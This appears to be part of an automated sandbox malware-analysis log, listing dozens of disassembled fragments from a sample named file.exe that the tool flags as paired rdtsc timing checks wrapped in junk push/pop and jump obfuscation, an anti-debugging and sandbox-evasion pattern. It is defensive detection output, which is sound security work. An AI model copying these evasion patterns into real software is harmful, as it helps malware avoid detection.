                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D73E second address: 93D742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93DC5C second address: 93DC62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E58F second address: 93E593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E593 second address: 93E597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E4A1 second address: 93E4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E597 second address: 93E59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E59D second address: 93E5A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F552 second address: 93F561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940009 second address: 940013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FFBC91A3BD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940A59 second address: 940A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940A5D second address: 940AF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnp 00007FFBC91A3BD6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FFBC91A3BE8h 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FFBC91A3BD8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov edi, ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FFBC91A3BD8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 push 00000000h 0x00000055 and edi, 2076C458h 0x0000005b xchg eax, ebx 0x0000005c jo 00007FFBC91A3BEFh 0x00000062 push eax 0x00000063 push edx 0x00000064 push edx 0x00000065 pop edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941571 second address: 94157A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942D25 second address: 942D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940830 second address: 940836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940836 second address: 94083B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94083B second address: 940845 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFBC8B2DA9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9448AA second address: 9448B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9448B3 second address: 9448BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FFBC8B2DA96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9448BD second address: 9448C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945F68 second address: 945FB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FFBC8B2DA9Dh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FFBC8B2DA9Dh 0x00000013 jne 00007FFBC8B2DA96h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push edx 0x0000001d push edi 0x0000001e jmp 00007FFBC8B2DAA5h 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007FFBC8B2DA96h 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB07 second address: 94AB11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941F5B second address: 941F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CB45 second address: 94CB4F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94DAE3 second address: 94DB6C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC8B2DAA3h 0x00000008 jmp 00007FFBC8B2DA9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FFBC8B2DA98h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov ebx, eax 0x0000002c push 00000000h 0x0000002e jnc 00007FFBC8B2DA9Ch 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FFBC8B2DA98h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 push esi 0x00000053 push edi 0x00000054 pop edi 0x00000055 pop esi 0x00000056 pushad 0x00000057 jmp 00007FFBC8B2DAA7h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94EBC7 second address: 94EBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94EBCD second address: 94EBDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FFBC8B2DA96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94EBDF second address: 94EBE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9521E0 second address: 952273 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FFBC8B2DAA4h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FFBC8B2DA98h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D2C77h], ecx 0x0000002f pushad 0x00000030 xor ecx, dword ptr [ebp+122D1FA2h] 0x00000036 or dword ptr [ebp+122D2C60h], esi 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FFBC8B2DA98h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 add dword ptr [ebp+12456EC0h], ebx 0x0000005f push eax 0x00000060 pushad 0x00000061 jmp 00007FFBC8B2DAA1h 0x00000066 push ebx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948C2F second address: 948C49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BE5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9531FB second address: 953200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953200 second address: 953222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBC91A3BD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007FFBC91A3BE0h 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9541A1 second address: 954239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FFBC8B2DAA2h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FFBC8B2DA98h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a pushad 0x0000002b xor cx, 4A37h 0x00000030 mov dword ptr [ebp+122D1F06h], esi 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007FFBC8B2DA98h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+122D2439h] 0x00000059 mov ebx, dword ptr [ebp+12450FEBh] 0x0000005f push 00000000h 0x00000061 jmp 00007FFBC8B2DAA2h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FFBC8B2DA9Dh 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CCCF second address: 94CCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBC91A3BE1h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95622E second address: 95624C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CCEA second address: 94CD05 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFBC91A3BDFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95624C second address: 956261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94ED6A second address: 94EE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FFBC91A3BD8h 0x00000011 pop edx 0x00000012 nop 0x00000013 mov di, ax 0x00000016 call 00007FFBC91A3BDAh 0x0000001b sub ebx, dword ptr [ebp+122D3806h] 0x00000021 pop ebx 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov dword ptr [ebp+122D2962h], ecx 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 xor ebx, dword ptr [ebp+122D217Bh] 0x0000003c mov eax, dword ptr [ebp+122D0111h] 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FFBC91A3BD8h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push ebx 0x00000061 call 00007FFBC91A3BD8h 0x00000066 pop ebx 0x00000067 mov dword ptr [esp+04h], ebx 0x0000006b add dword ptr [esp+04h], 00000018h 0x00000073 inc ebx 0x00000074 push ebx 0x00000075 ret 0x00000076 pop ebx 0x00000077 ret 0x00000078 nop 0x00000079 jp 00007FFBC91A3BE0h 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94EE06 second address: 94EE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95720B second address: 957210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B39B second address: 95B3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B3A1 second address: 95B3A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953398 second address: 953416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FFBC8B2DAA1h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1F06h], ecx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jo 00007FFBC8B2DA9Ch 0x0000001f add dword ptr [ebp+1244E131h], eax 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov eax, dword ptr [ebp+122D1505h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FFBC8B2DA98h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c jmp 00007FFBC8B2DAA1h 0x00000051 push FFFFFFFFh 0x00000053 mov edi, dword ptr [ebp+122D39F6h] 0x00000059 push eax 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953416 second address: 95341A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954313 second address: 954336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FFBC8B2DAA7h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95648B second address: 95648F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95648F second address: 9564A1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9564A1 second address: 9564A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9564A5 second address: 9564AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9584D9 second address: 9584DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95249C second address: 9524CD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FFBC8B2DAADh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9524CD second address: 9524D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEC58 second address: 8FECA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FFBC8B2DAA4h 0x0000000d jmp 00007FFBC8B2DAA2h 0x00000012 jmp 00007FFBC8B2DAA1h 0x00000017 ja 00007FFBC8B2DA96h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FECA2 second address: 8FECA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FECA6 second address: 8FECC0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC8B2DAA0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FECC0 second address: 8FECC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963296 second address: 96329A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96350D second address: 963517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FFBC91A3BD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96863D second address: 968643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9691F7 second address: 969219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FFBC91A3BD8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969219 second address: 969233 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC8B2DA9Ch 0x00000008 jne 00007FFBC8B2DA96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969233 second address: 969266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFBC91A3BE9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969266 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FFBC8B2DAA9h 0x0000000f push dword ptr [ebp+122D0595h] 0x00000015 cld 0x00000016 jbe 00007FFBC8B2DAA2h 0x0000001c jc 00007FFBC8B2DA9Ch 0x00000022 jbe 00007FFBC8B2DA96h 0x00000028 call dword ptr [ebp+122D1DD7h] 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D189Fh], edi 0x00000035 xor eax, eax 0x00000037 jmp 00007FFBC8B2DAA0h 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 mov dword ptr [ebp+122D189Fh], esi 0x00000046 mov dword ptr [ebp+122D39AAh], eax 0x0000004c jmp 00007FFBC8B2DA9Ch 0x00000051 jmp 00007FFBC8B2DAA7h 0x00000056 mov esi, 0000003Ch 0x0000005b jmp 00007FFBC8B2DAA9h 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 jmp 00007FFBC8B2DAA6h 0x00000069 clc 0x0000006a lodsw 0x0000006c stc 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 clc 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 sub dword ptr [ebp+122D189Fh], edx 0x0000007c nop 0x0000007d push esi 0x0000007e push eax 0x0000007f push edx 0x00000080 pushad 0x00000081 popad 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DCAD second address: 96DCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E392 second address: 96E3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DAA0h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E3AB second address: 96E3B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E3B1 second address: 96E3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E6B6 second address: 96E6C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFBC91A3BD6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96EAC7 second address: 96EADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96EADD second address: 96EAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96EC5E second address: 96EC64 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96EC64 second address: 96EC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFBC91A3BDCh 0x0000000c jp 00007FFBC91A3BD6h 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FFBC91A3BD6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96EDD0 second address: 96EE18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC8B2DAB9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC8B2DAA8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 974852 second address: 97485A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97485A second address: 974871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DAA0h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 974871 second address: 974875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
